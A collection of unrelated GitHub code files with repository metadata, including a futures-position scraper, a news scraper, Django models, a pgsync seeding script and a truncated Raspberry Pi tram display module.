pd.DataFrame([])\n dataout['tradeDate'] = dataout['tradeDate'].astype(str)\n dataout['tradeDate'] = pd.to_datetime(dataout['tradeDate'],\\\n format='%Y-%m-%d',errors='ignore')\n dataout['net_position'] = dataout['long_position'] -\\\n dataout['short_position']\n dataout['net_position_increase'] = \\\n dataout['long_position_increase'] \\\n - dataout['short_position_increase']\n return dataout\n\n dateList = pd.DataFrame()\n dateList['tradeDate'] = self.tradeDateList['tradeDate'].astype(str)\n if contract_indic == 'this' or contract_indic == 'this&next':\n self.this_contract(windSymbol)\n dateList[symbol+'_contract'] = self.tradeDateList[symbol+'_contract']\\\n +'.'+ windSymbol.split('.')[1]\n else:\n dateList[symbol+'_contract'] = [None]*len(dateList)\n\n for position in ['long','short']:\n endDate = str(self.workDate)\n #如果存在数据,从上次更新日之后更新\n status = 0\n data = pd.DataFrame()\n\n if os.path.exists(self.homePath + 'rank' + self.suffix):\n try:\n lastData = pd.read_hdf(self.homePath + 'rank' \\\n + self.suffix, position +'_'+ windSymbol)\n if len(lastData) == 0:\n continue\n lastDate = str(lastData['tradeDate'].iloc[-1])\n lastDate = lastDate[0:4] + lastDate[5:7] + lastDate[8:10]\n beginDate = dateList[dateList['tradeDate'] > lastDate]\\\n ['tradeDate'].iloc[0]\n beginDate = str(beginDate)\n if beginDate > endDate:\n continue\n print(windSymbol+ '_' +position+ ', begin:' + beginDate +\\\n ',end:' + endDate + ' updating...')\n data = lastData\n except:\n status = 1\n #不存在\n else:\n status = 1\n if status == 1:\n beginDate = str(self.beginDate)\n print(windSymbol+ '_' +position+', begin:'+\\\n beginDate+' getting...')\n\n tempDateList = dateList[dateList['tradeDate'] >= beginDate]\n tempDateList = tempDateList[tempDateList['tradeDate'] <=\\\n endDate].reset_index(drop=True)\n for i in range(len(tempDateList)):\n date = tempDateList['tradeDate'][i]\n contract = tempDateList[symbol+'_contract'][i]\n print(date)\n if data.empty:\n data = getFutureoirByDate(date,date,windSymbol,\\\n contract,position)\n else:\n temdata = getFutureoirByDate(date,date,windSymbol,\\\n contract,position)\n data = pd.concat([data,temdata])\n data = data.reset_index(drop=True)\n data['updatingTime'] = t.strftime('%Y-%m-%d %H:%M:%S')\n data = data[colNamesFinal]\n data.to_hdf(self.homePath + 'rank'+self.suffix, position + '_' +\\\n windSymbol)\n def x_or_y(df):\n c = df.columns\n choise = np.sign((df[c[0]]-df[c[1]]).apply(np.sign)+1/2)\n result = 
pd.DataFrame()\n result[c[0][:-2]] = (df[c[0]]*(1+choise)+df[c[1]]*(1-choise))/2\n if len(c)>2:\n result[c[2][:-2]] = (df[c[2]]*(1+choise)+df[c[3]]*(1-choise))/2\n return result\n\n #生成连续数据\n print('continous data merging...')\n long_p = pd.read_hdf(self.homePath + 'rank'+self.suffix, \\\n 'long_' + windSymbol)\n short_p = pd.read_hdf(self.homePath + 'rank'+self.suffix, \\\n 'short_' + windSymbol)\n con_position = pd.merge(long_p.drop(['ranks','updatingTime'],axis = 1)\\\n .fillna(0),short_p.drop(['ranks','updatingTime'],\\\n axis = 1).fillna(0),on=['member_name','tradeDate'],\\\n how = 'outer').fillna(0)\n con_position = con_position.sort_values(\\\n by=['tradeDate','long_position_x'],ascending = [True,False])\n con_p = pd.DataFrame(data = [],\\\n index = range(len(con_position)),columns = colNamesCon)\n con_position = con_position.reset_index()\n for z in ['long_position','short_position','net_position']:\n print(z +' merging...')\n p_df = con_position[[z+'_x',z+'_y',z+'_increase_x',z+'_increase_y']]\n con_p[[z,z+'_increase']] = x_or_y(p_df)\n p_df = con_position[['volume_x','volume_y']]\n print('volume merging...')\n con_p['volume'] = x_or_y(p_df)\n\n con_p['tradeDate'] = con_position['tradeDate']\n con_p['member_name'] = con_position['member_name']\n con_p['updatingTime'] = t.strftime('%Y-%m-%d %H:%M:%S')\n con_p=con_p[colNamesCon]\n con_p.to_hdf(self.homePath+'rank'+self.suffix,windSymbol)\n\n if contract_indic == 'this&next':\n self.next_contract(windSymbol)\n dateList[symbol+'_next'] = self.tradeDateList[symbol+'_next']\\\n +'.'+ windSymbol.split('.')[1]\n for position in ['long','short']:\n endDate = str(self.workDate)\n #如果存在数据,从上次更新日之后更新\n status = 0\n data = pd.DataFrame()\n\n if os.path.exists(self.homePath + 'rank' + self.suffix):\n try:\n lastData = pd.read_hdf(self.homePath + 'rank' \\\n + self.suffix, position +'_'+ windSymbol+'_next')\n if len(lastData) == 0:\n continue\n lastDate = str(lastData['tradeDate'].iloc[-1])\n lastDate = lastDate[0:4] + lastDate[5:7] + lastDate[8:10]\n beginDate = dateList[dateList['tradeDate'] > lastDate]\\\n ['tradeDate'].iloc[0]\n beginDate = str(beginDate)\n if beginDate > endDate:\n continue\n print(windSymbol+'_next'+ '_' +position+ ', begin:' +\\\n beginDate +',end:' + endDate + ' updating...')\n data = lastData\n except:\n status = 1\n #不存在\n else:\n status = 1\n if status == 1:\n beginDate = str(self.beginDate)\n print(windSymbol+'_next'+ '_' +position+', begin:'+\\\n beginDate+' getting...')\n\n tempDateList = dateList[dateList['tradeDate'] >= beginDate]\n tempDateList = tempDateList[tempDateList['tradeDate'] <=\\\n endDate].reset_index(drop=True)\n for i in range(len(tempDateList)):\n date = tempDateList['tradeDate'][i]\n contract = tempDateList[symbol+'_next'][i]\n if len(contract)>6:\n print(date)\n if data.empty:\n data = getFutureoirByDate(date,date,windSymbol,\\\n contract,position)\n else:\n temdata = getFutureoirByDate(date,date,windSymbol,\\\n contract,position)\n data = pd.concat([data,temdata])\n data = data.reset_index(drop=True)\n data['updatingTime'] = t.strftime('%Y-%m-%d %H:%M:%S')\n data = data[colNamesFinal]\n data.to_hdf(self.homePath + 'rank'+self.suffix, position + '_' +\\\n windSymbol+'_next')\n\n #生成连续数据\n print('continous data merging...')\n long_p = pd.read_hdf(self.homePath + 'rank'+self.suffix, \\\n 'long_' + windSymbol+'_next')\n short_p = pd.read_hdf(self.homePath + 'rank'+self.suffix, \\\n 'short_' + windSymbol+'_next')\n con_position = pd.merge(long_p.drop(['ranks','updatingTime'],axis = 1)\\\n 
.fillna(0),short_p.drop(['ranks','updatingTime'],\\\n axis = 1).fillna(0),on=['member_name','tradeDate'],\\\n how = 'outer').fillna(0)\n con_position = con_position.sort_values(\\\n by=['tradeDate','long_position_x'],ascending = [True,False])\n con_p = pd.DataFrame(data = [],\\\n index = range(len(con_position)),columns = colNamesCon)\n con_position = con_position.reset_index()\n for z in ['long_position','short_position','net_position']:\n print(z +'_next merging...')\n p_df = con_position[[z+'_x',z+'_y',z+'_increase_x',z+'_increase_y']]\n con_p[[z,z+'_increase']] = x_or_y(p_df)\n p_df = con_position[['volume_x','volume_y']]\n print('volume_next merging...')\n con_p['volume'] = x_or_y(p_df)\n\n con_p['tradeDate'] = con_position['tradeDate']\n con_p['member_name'] = con_position['member_name']\n con_p['updatingTime'] = t.strftime('%Y-%m-%d %H:%M:%S')\n con_p=con_p[colNamesCon]\n con_p.to_hdf(self.homePath+'rank'+self.suffix,windSymbol+'_next')\n\n print (symbol + \" futureoir source data update complete!\")\n return\n\n def getSignal(self,windSymbol,contract_indic=None):\n con_position = pd.read_hdf(self.homePath+'rank'+self.suffix,windSymbol)\n #强制默认参数为[5,10,20],否则出错\n sum_position = pd.DataFrame(data = [],index = range(len(con_position)),\\\n columns = ['tradeDate']+['long_position_increase5']+\\\n ['long_position_increase10']+['long_position_increase20']+\\\n ['short_position_increase5']+['short_position_increase10']+\\\n ['short_position_increase20'])\n #生成排名数据\n j = 0\n for i in range(len(con_position)):\n if i == 0 or (con_position['tradeDate'][i] != \\\n con_position['tradeDate'][i-1]):\n sum_position['tradeDate'][j] = con_position['tradeDate'][i]\n for tem_i in range(len(self.params)):\n sum_position['long_position_increase_'+str(self.params[tem_i])][j] = \\\n con_position['long_position_increase'][i+len(self.params)-1-tem_i]\n sum_position['short_position_increase_'+str(self.params[tem_i])][j] = \\\n con_position['short_position_increase'][i+len(self.params)-1-tem_i]\n j = j + 1\n sum_position = sum_position.iloc[0:j]\n\n if contract_indic == 'this&next':\n con_position_next = pd.read_hdf(self.homePath+'rank'+self.suffix,windSymbol+'_next')\n sum_position_next = pd.DataFrame(data = [],index = range(len(con_position_next)),\\\n columns = ['tradeDate']+['long_position_increase5']+\\\n ['long_position_increase10']+['long_position_increase20']+\\\n ['short_position_increase5']+['short_position_increase10']+\\\n ['short_position_increase20'])\n #生成排名数据\n j = 0\n for i in range(len(con_position_next)):\n if i == 0 or (con_position_next['tradeDate'][i] != \\\n con_position_next['tradeDate'][i-1]):\n sum_position_next['tradeDate'][j] = con_position_next['tradeDate'][i]\n for tem_i in range(len(self.params)):\n sum_position_next['long_position_increase_'\\\n +str(self.params[tem_i])][j] = \\\n con_position_next['long_position_increase']\\\n [i+len(self.params)-1-tem_i]\n sum_position_next['short_position_increase_'\\\n +str(self.params[tem_i])][j] = \\\n con_position_next['short_position_increase']\\\n [i+len(self.params)-1-tem_i]\n j = j + 1\n sum_position_next = sum_position_next.iloc[0:j]\n\n sum_position = sum_position.merge(sum_position_next,on=['tradeDate'],how='outer')\n for col in ['long_position_increase5','long_position_increase10',\n 'long_position_increase20','short_position_increase5',\n 'short_position_increase10','short_position_increase20']:\n sum_position[col+'_y'].fillna(0,inplace=True)\n sum_position[col] = sum_position[col+'_x']+sum_position[col+'_y']\n\n #signal\n 
signal = pd.DataFrame()\n signal['tradeDate'] = sum_position['tradeDate']\n for k in self.params:\n signal['long' + str(k)] = sum_position['long_position_increase_'+str(k)]\n signal['short' + str(k)] = sum_position['short_position_increase_'+str(k)]\n signal['signal' + str(k)] = (sum_position['long_position_increase_'+str(k)].\\\n apply(np.sign) - sum_position['short_position_increase_'+str(k)].\\\n apply(np.sign))//2\n print(windSymbol.split('.')[0] + ' signal complete !')\n return signal\n\n def get_rank_data(self,date,variety):\n month = str(date)[0:6]\n day = str(date)[6:]\n SIM_HAEDERS = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'}\n try:\n xml1 = urlopen(Request('http://www.cffex.com.cn/sj/ccpm/'+month+'/'+day+'/'+variety+'.xml',\n headers=SIM_HAEDERS)).read().decode('utf-8', 'ignore')\n except HTTPError as reason:\n if reason.code != 404:\n print(404)\n\n root = ET.fromstring(xml1)\n\n data_attr = ['instrumentid','tradingday','datatypeid','rank','shortname',\n 'volume','varvolume','partyid','productid']\n data_attr_old = ['instrumentId','tradingDay','dataTypeId','rank','shortname',\n 'volume','varVolume','partyid','productid']\n \"\"\"\n posi_attr = ['tradingday','instrumentid','volumeamt','varvolumeamt',\n 'buyvolumeamt','buyvarvolumeamt','sellvolumeamt','sellvarvolumeamt',\n 'productid','futurecompany']\n \"\"\"\n data = []\n for d in root.findall('data'):\n temp = []\n try:\n for attr in data_attr:\n t = d.find(attr).text\n temp.append(t)\n data.append(temp)\n #print(temp)\n except:\n for attr in data_attr_old:\n t = d.find(attr).text\n temp.append(t)\n data.append(temp)\n vol5 = [0,0,0]\n varvol5 = [0,0,0]\n vol10 = [0,0,0]\n varvol10 = [0,0,0]\n vol = [0,0,0]\n varvol = [0,0,0]\n for x in data:\n if int(x[3])<=10:\n vol10[int(x[2])] +=int(x[5])\n varvol10[int(x[2])] += int(x[6])\n if int(x[3])<=5:\n vol5[int(x[2])] +=int(x[5])\n varvol5[int(x[2])] += int(x[6])\n vol[int(x[2])] +=int(x[5])\n varvol[int(x[2])] += int(x[6])\n return (varvol5[1],varvol5[2],varvol10[1],varvol10[2],varvol[1],varvol[2])\n\n def get_signal_cffex(self,windSymbol):\n symbol = windSymbol.split('.')[0]\n dateList = pd.DataFrame()\n dateList['tradeDate'] = self.tradeDateList['tradeDate'].astype(str)\n try:\n last_chg = pd.read_csv(self.homePath+symbol+'_chg.csv')\n first_date = last_chg['tradeDate'].iloc[0]\n if first_date > self.beginDate:\n update_idx = 0\n tempDateList = dateList[dateList['tradeDate'] >= str(self.beginDate)]\n else:\n last_date = last_chg['tradeDate'].iloc[-1]\n print('Last date:', last_date)\n tempDateList = dateList[dateList['tradeDate'] > str(last_date)]\n update_idx = 1\n except:\n update_idx = 0\n tempDateList = dateList[dateList['tradeDate'] >= str(self.beginDate)]\n tempDateList = tempDateList[tempDateList['tradeDate'] <=str(self.workDate)]\\\n .reset_index(drop=True)\n L1, L2, L3, S1, S2, S3 = [], [], [], [], [], []\n for date in tempDateList['tradeDate']:\n print(date)\n try:\n l1,s1,l2,s2,l3,s3 = self.get_rank_data(date,symbol)\n L1.append(l1)\n L2.append(l2)\n L3.append(l3)\n S1.append(s1)\n S2.append(s2)\n S3.append(s3)\n except:\n L1.append(0)\n L2.append(0)\n L3.append(0)\n S1.append(0)\n S2.append(0)\n S3.append(0)\n chg_df = pd.DataFrame({'tradeDate':tempDateList['tradeDate'],\\\n 'long5':L1,'short5':S1,\\\n 'long10':L2,'short10':S2,\\\n 'long20':L3,'short20':S3,\\\n })\n if update_idx == 1:\n chg_df = pd.concat([last_chg,chg_df])\n chg_cols = ['tradeDate','long5','long10','long20',\\\n 'short5','short10','short20']\n chg_df = chg_df[chg_cols]\n 
chg_df.to_csv(self.homePath+symbol+'_chg.csv',index = None)\n signal = pd.DataFrame()\n signal_cols = chg_cols+['signal5','signal10','signal20']\n signal['tradeDate'] = chg_df['tradeDate']\n for para in ['5','10','20']:\n signal['long'+para] = chg_df['long'+para]\n signal['short'+para] = chg_df['short'+para]\n signal['signal'+para] = ((chg_df['long'+para].apply(np.sign) - \\\n chg_df['short'+para].apply(np.sign))/2).apply(int)\n return signal[signal_cols]\n\n\nif __name__=='__main__':\n homePath = '/Users/weiss/Desktop/zxjt'\n windSymbol = 'IF.CFE'\n IF = oir(homePath,updatebegin = 20100416,endDate = 20180715)\n #IF.updateDataFromWind(windSymbol,contract_indic='this&next')\n #sig = IF.getSignal(windSymbol,contract_indic='this&next')\n sig = IF.get_signal_cffex(windSymbol)\n sig.to_csv(homePath + '/signal.csv',index = None)\n","repo_name":"nkzhengwt/Spyder_cta","sub_path":"get_oir_c.py","file_name":"get_oir_c.py","file_ext":"py","file_size_in_byte":24492,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"45"} +{"seq_id":"19680775439","text":"import xlrd\nfrom datetime import datetime,date\n\n# 文件路径\nfile_path = '1.xlsx'\n# 设置编码\nxlrd.Book.encoding = 'utf8'\n# 获取数据\ndata = xlrd.open_workbook(file_path)\n# 获取所有的sheet\nsheet = data.sheet_names()\n\nfor item in sheet:\n\ttable = data.sheet_by_name(item)\n\t# print(item)\n\t# 取总行数\n\t# print(table.nrows)\n\t# 取总列数\n\t# print(table.ncols)\n\tprint(item, \"行数\", table.nrows, \"列数\", table.ncols)\n\n# sheet1的数据\nsheet1_data = data.sheet_by_index(0)\nsheet1_nrows = sheet1_data.nrows\nsheet1_ncols = sheet1_data.ncols\n\nfor i in range(sheet1_nrows):\n\tfor j in range(sheet1_ncols):\n\t\t# print(i, \"※\", j, end=' ')\n\t\tprint(sheet1_data.cell(i,j).value, sheet1_data.cell(i,j).ctype, end=' ')\n\tprint()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"wangfan1996/python","sub_path":"pythonProject/other/excel/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"22785342247","text":"import unittest\nfrom unittest import mock\nfrom resource_manager_common import constant\n\nfrom resource_types import Custom_ResourceGroupConfiguration\nfrom cgf_utils import custom_resource_response\n\n\nclass UnitTest_CloudGemFramework_ProjectResourceHandler_ResourceGroupConfiguration(unittest.TestCase):\n\n event = {}\n\n context = {}\n\n def setUp(self):\n self.event = {\n 'ResourceProperties': {\n 'ConfigurationBucket': 'TestBucket',\n 'ConfigurationKey': 'TestKey',\n 'ResourceGroupName': 'TestResourceGroup'\n },\n 'StackId': 'arn:aws:cloudformation:TestRegion:TestAccount:stack/TestStack/TestUUID'\n }\n\n\n def test_handler(self):\n\n expected_data = {\n 'ConfigurationBucket': 'TestBucket',\n 'ConfigurationKey': 'TestKey/resource-group/TestResourceGroup',\n 'TemplateURL': 'https://s3.amazonaws.com/TestBucket/TestKey/resource-group/TestResourceGroup/'+constant.RESOURCE_GROUP_TEMPLATE_FILENAME\n }\n\n expected_physical_id = 'CloudCanvas:LambdaConfiguration:TestStack:TestResourceGroup'\n \n with mock.patch.object(custom_resource_response, 'success_response') as mock_custom_resource_response_succeed:\n Custom_ResourceGroupConfiguration.handler(self.event, self.context)\n mock_custom_resource_response_succeed.assert_called_with(expected_data, 
expected_physical_id)\n\n","repo_name":"aws/lumberyard","sub_path":"dev/Gems/CloudGemFramework/v1/AWS/lambda-code/ProjectResourceHandler/test/test_ResourceGroupConfigurationResourceHandler.py","file_name":"test_ResourceGroupConfigurationResourceHandler.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":1982,"dataset":"github-code","pt":"45"} +{"seq_id":"40218000232","text":"import os\nimport sys\nsys.path.insert(0, \"../../\")\nimport pandas as pd\nfrom src.scraper.scrape import WebScraper\n\ntarget_dir = sys.path[0] + \"data/text/tonga/\"\nif not os.path.exists(target_dir):\n os.mkdir(target_dir)\n\nsearch_urls = [f\"https://matangitonga.to/topic/all?page={num}\"\n for num in range(1, 932)]\nmtg = WebScraper(\"html.parser\")\nurls_raw = mtg.scrape_urls(search_urls, [\"views-field views-field-title\",\n \"views-field views-field-term-node-tid\",\n \"views-field views-field-field-first-publication\",\n \"views-field views-field-field-location\"],\n speed_up=True)\nurls_info = {\n \"url\" : [],\n \"date\": [],\n \"title\" : [],\n \"tag\": [],\n \"location\": [],\n}\nfor page in urls_raw:\n page_url, page_raw = page[0], page[1]\n urls_info[\"title\"].extend([i.text for i in page_raw[0]])\n urls_info[\"url\"].extend([i.find(\"a\")[\"href\"] for i in page_raw[0]])\n urls_info[\"date\"].extend([i.text for i in page_raw[2]])\n urls_info[\"tag\"].extend([i.text for i in page_raw[1]])\n urls_info[\"location\"].extend([i.text.strip() for i in page_raw[3]])\n\nmtg_urls = pd.DataFrame(urls_info)\nmtg_urls[\"url\"] = [f\"https://matangitonga.to{url}\" for url in mtg_urls.url]\nmtg_urls[\"date\"] = pd.to_datetime(mtg_urls[\"date\"])\nmtg_urls.to_csv(f\"{target_dir}matangi_urls.csv\", encoding=\"utf-8\")\n\n# \nurls_df = pd.read_csv(target_dir+\"matangi_urls.csv\").drop(\"Unnamed: 0\", axis=1)\nurls_df[\"tonga\"] = urls_df[\"location\"].apply(lambda x: \"tonga\" in str(x).lower())\nnews_urls = urls_df[urls_df[\"tonga\"] == True][\"url\"].tolist()\nprint_urls_raw = mtg.scrape_urls(news_urls, \"print-page\", speed_up=True)\n\n# Create a mapping between page urls and \nurls_mapping = []\nfor i in print_urls_raw:\n original_url = i[0]\n print_url = i[1][0][\"href\"]\n urls_mapping.append([original_url, print_url])\nurls_map_df = pd.DataFrame(urls_mapping, columns=[\"original_url\", \"print_url\"])\nurls_map_df.to_csv(f\"{target_dir}matangi_urls_map.csv\", encoding=\"utf-8\")\n\nprint_urls = urls_map_df[\"print_url\"].tolist()\nnews_raw = mtg.scrape_urls(print_urls, \"field__items\", speed_up=True)\n\nnews_info = []\nfor raw in news_raw:\n url = raw[0]\n if len(raw[1]) > 1:\n news = raw[1][1].text\n elif len(raw[1]) == 1:\n news = raw[1][0].text\n news_info.append([url, news])\n\nnews_df = pd.DataFrame(news_info, columns=[\"print_url\", \"news\"])\nnews_df = (news_df.merge(urls_map_df, how=\"left\", on=\"print_url\")\n .merge(urls_df, how=\"left\", \n left_on=\"original_url\", right_on=\"url\"))\nnews_df = news_df[[\"url\", \"date\", \"title\", \"news\", \"tag\"]]\nnews_df.to_csv(target_dir+\"matangi_news.csv\", encoding=\"utf-8\")","repo_name":"worldbank/pacific-observatory","sub_path":"scripts/scraping/matangi.py","file_name":"matangi.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"24882821181","text":"from gui.mainModel import MainModel\nfrom gui.mainView import Ui_MainWindow\nfrom functools import partial\n\n\n\nclass MainController:\n\n\tdef 
__init__(self, view: Ui_MainWindow,model:MainModel):\n\n\t\tself._view = view\n\t\tself._model = model\n\t\tself._connectView()\n\n\tdef _connectView(self):\n\t\tassert self._view is not None\n\t\t# Connect buttons\n\t\t# btn = self._view.mainWindow\n\t\tself._view.btnGenerateSample.clicked.connect(self.btnShowSampleClicked)\n\t\tself._view.btn_Font.clicked.connect(self.fontClicked)\n\t\tself._view.btn_Font_Color.clicked.connect(partial(self.colorChooseClicked,self._view.btn_SelectedColor_Font,'selectedFontColor'))\n\t\tself._view.btn_Background_Color.clicked.connect(partial(self.colorChooseClicked,self._view.btn_SelectedColor_Background,'selectedBgColor'))\n\t\tself._view.btn_Border_Color.clicked.connect(partial(self.colorChooseClicked,self._view.btn_SelectedColor_Border,'selectedBorderColor'))\n\t\tself._view.btn_Fill_Color.clicked.connect(partial(self.colorChooseClicked,self._view.btn_SelectedColor_Fill,'selectedFillColor'))\n\t\tself.btnShowSampleClicked()\n\n\tdef colorChooseClicked(self,who,field):\n\t\tcolor = self._view.colorDialog(getattr(self._view,field))\n\n\t\tif color.isValid():\n\t\t\tsetattr(self._view,field,color)\n\t\t\tself._view.showSelectedColor(who,color)\n\n\n\tdef fontClicked(self):\n\t\tfont,valid = self._view.fontDialog(self._view.selectedFont)\n\t\tif valid:\n\n\t\t\tself._view.selectedFont = font\n\t\t\tself._view.showSelectedFont(font.toString())\n\t\telse:\n\t\t\tself._view.showSelectedFont('Zvolený font nie je podporovaný')\n\n\tdef btnShowSampleClicked(self):\n\t\t\"\"\"MAKE SETTINGS FROM FIELDS AND SHOW SAMPLE\"\"\"\n\t\tsettings = self.makeSettings()\n\n\n\t\tsample,valid = self._model.makeSample(settings)\n\t\tif valid:\n\t\t\tself._view.showSample(sample)\n\t\telse:\n\t\t\t# print('laal')\n\t\t\tself._view.lb_ImageSample.setVisible(True)\n\t\t\tself._view.lb_ImageSample.setText(\"Veľkosť generovaného textu presahuje veľkosť rozlíšenia,znížte rozlíšenie/upravte font\")\n\n\tdef makeSettings(self):\n\t\treturn self._view.construct_setting()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Flashikez/Text_Generator","sub_path":"gui/mainController.py","file_name":"mainController.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"10027621820","text":"import click\nfrom schema import Answer, Category, PossibleAnswer, Question, RealAnswer\nfrom sqlalchemy.orm import sessionmaker\n\nfrom pgsync.base import pg_engine, subtransactions\nfrom pgsync.helper import teardown\nfrom pgsync.utils import config_loader, get_config\n\n\n@click.command()\n@click.option(\n \"--config\",\n \"-c\",\n help=\"Schema config\",\n type=click.Path(exists=True),\n)\ndef main(config):\n config: str = get_config(config)\n teardown(drop_db=False, config=config)\n document = next(config_loader(config))\n database: str = document.get(\"database\", document[\"index\"])\n with pg_engine(database) as engine:\n Session = sessionmaker(bind=engine, autoflush=True)\n session = Session()\n\n # Bootstrap\n categories = [\n Category(\n id=1,\n uid=\"c001\",\n text=\"Colours\",\n ),\n Category(\n id=2,\n uid=\"c002\",\n text=\"Weather\",\n ),\n ]\n with subtransactions(session):\n session.add_all(categories)\n\n questions = [\n Question(\n id=1,\n uid=\"q001\",\n category_id=1,\n category_uid=\"c001\",\n text=\"What is your favorite color?\",\n ),\n Question(\n id=2,\n uid=\"q002\",\n category_id=2,\n category_uid=\"c002\",\n text=\"Is it raining outside?\",\n ),\n ]\n with subtransactions(session):\n 
session.add_all(questions)\n\n answers = [\n Answer(id=1, uid=\"a001\", text=\"Red\"),\n Answer(id=2, uid=\"a002\", text=\"Yes\"),\n Answer(id=3, uid=\"a003\", text=\"Green\"),\n Answer(id=4, uid=\"a004\", text=\"No\"),\n ]\n with subtransactions(session):\n session.add_all(answers)\n\n possible_answers = [\n PossibleAnswer(\n question_id=1,\n question_uid=\"q001\",\n answer_id=1,\n answer_uid=\"a001\",\n ),\n PossibleAnswer(\n question_id=1,\n question_uid=\"q001\",\n answer_id=3,\n answer_uid=\"a003\",\n ),\n PossibleAnswer(\n question_id=2,\n question_uid=\"q002\",\n answer_id=2,\n answer_uid=\"a002\",\n ),\n PossibleAnswer(\n question_id=2,\n question_uid=\"q002\",\n answer_id=4,\n answer_uid=\"a004\",\n ),\n ]\n with subtransactions(session):\n session.add_all(possible_answers)\n\n real_answers = [\n RealAnswer(\n question_id=1,\n question_uid=\"q001\",\n answer_id=1,\n answer_uid=\"a001\",\n ),\n RealAnswer(\n question_id=2,\n question_uid=\"q002\",\n answer_id=4,\n answer_uid=\"a004\",\n ),\n ]\n with subtransactions(session):\n session.add_all(real_answers)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"toluaina/pgsync","sub_path":"examples/quiz/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":958,"dataset":"github-code","pt":"45"} +{"seq_id":"10197390408","text":"import pandas as pd\nimport skimage.io as io\nimport tensorflow as tf\nfrom skimage.color import rgb2gray\nimport numpy as np\ndef load_image(image_name, path):\n image = io.imread(path + image_name)[:,:,:3]\n return image\n\ndef load_mask(mask_name, path):\n mask = tf.io.read_file(path + mask_name)\n mask = tf.io.decode_png(mask, channels=1)\n mask = tf.where(mask == 255, 1, 0)\n\n return mask\n\n#zo staat het in mijn folder\n#\\Vision\\code_eind_opdracht\\data\\Mask\\0.png\"\ndef get_list_of_mask_and_image(start, end, path=\"./data\"):\n path_meta_data = path + \"/metadata.csv\"\n df_meta_data = pd.read_csv(path_meta_data)\n df_meta_data = df_meta_data.drop([28])\n df_meta_data = df_meta_data.drop([22])\n df_meta_data = df_meta_data.drop([19])\n df_meta_data = df_meta_data.drop([14])\n df_meta_data = df_meta_data.drop([9])\n selection = df_meta_data[start:end + 1]\n image_list = []\n mask_list = []\n #name_list = []\n for row in selection.iterrows():\n try:\n image = load_image(row[1]['Image'], path + \"/Image/\")\n mask = load_mask(row[1]['Mask'], path + \"/Mask/\")\n except:\n print(\"error with \", row[1])\n image_list.append(image)\n mask_list.append(mask)\n #str = (row[1]['Image'] + row[1]['Mask'])\n #name_list.append(str)\n image = None\n mask = None\n list_all = [image_list, mask_list]\n return list_all\n\ndef load_single_image(image_number, path=\"./data\"):\n path_meta_data = path + \"/metadata.csv\"\n df_meta_data = pd.read_csv(path_meta_data)\n row = df_meta_data.loc[image_number]\n return load_image(row['Image'], path + \"/Image/\")\n\ndef load_single_mask(mask_number, path=\"./data\"):\n path_meta_data = path + \"/metadata.csv\"\n df_meta_data = pd.read_csv(path_meta_data)\n row = df_meta_data.loc[mask_number]\n return load_mask(row['Mask'], path + \"/Mask/\")\n","repo_name":"raubenravi/Vision","sub_path":"code_eind_opdracht/data_inladen.py","file_name":"data_inladen.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"11468767647","text":"from django.db import models\n\nfrom cities.models import 
City\n\n\nclass Airport(models.Model):\n code = models.PositiveIntegerField(unique=True,null=False, blank=False)\n description = models.CharField(max_length=100)\n city = models.ForeignKey(City, on_delete=models.SET_NULL, null=True, blank=True)\n city_description = models.CharField(max_length=100, blank=True)\n lat = models.FloatField(null=True)\n lng = models.FloatField(null=True)\n country_code = models.CharField(max_length=2, blank=True)\n state_code = models.CharField(max_length=2, blank=True)\n \n def __str__(self):\n return self.description\n\nclass Flight(models.Model):\n itin_id = models.PositiveBigIntegerField(null=False, blank=False)\n mkt_id = models.PositiveBigIntegerField(null=False, blank=False)\n quarter = models.PositiveIntegerField(null=False, blank=False)\n origin_airport = models.ForeignKey(Airport, to_field=\"code\", on_delete=models.CASCADE, related_name=\"origin_airport\")\n dest_airport = models.ForeignKey(Airport, to_field=\"code\", on_delete=models.CASCADE, related_name=\"destination_airport\")\n passengers = models.PositiveIntegerField(null=False, blank=False)\n distance = models.PositiveIntegerField(null=False, blank=False)\n\n def __str__(self):\n return str(self.itin_id)\n","repo_name":"Kamil-Dab/Tass","sub_path":"tass_project/flights/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"71030648775","text":"\"\"\"\nTraitement le l'affichage des horaires et des lignes de tram.\n\nLe module est adapté à un écran lcd 16x2 mais est compatible avec tout\nautre taille en apportant de légères modifications.\n\"\"\"\n\nfrom datetime import datetime, timedelta\nimport sys\nimport logging\nimport threading\nimport rpi_i2c_lcd\nimport shared_data\nimport lcd_animations as anim\n\nREFRESH_TIME = 1 # Rafraîchit l'écran toutes les secondes\nANIM_REFRESH_TIME = 0.35 # Pour l'animation\n\ndef minutes_left(arrival_time):\n \"\"\"Calcule des minutes restantes entre arrival_time et maintenant.\"\"\"\n return int(timedelta.total_seconds(arrival_time - datetime.now()) // 60)\n\n\n# A MODIFIER POUR ÉCRAN DIFFÉRENT\ndef display_header(display, station_name):\n \"\"\"Affichage nom de station et heure.\"\"\"\n display.display_string(\"{:10.10} {:%H:%M}\".format(\n station_name, datetime.now()), 1)\n\n\ndef display_one_tramway(display, info_list):\n \"\"\"Affichage temps restant pour un tram.\"\"\"\n display.display_string(\"{}:{:3}m\".format(\n info_list[0][0], info_list[0][1])\n + \" \" * 10, 2)\n\n\ndef display_two_tramways(display, info_list):\n \"\"\"Affichage temps restant pour deux trams.\"\"\"\n display.display_string(\"{}:{:3}m 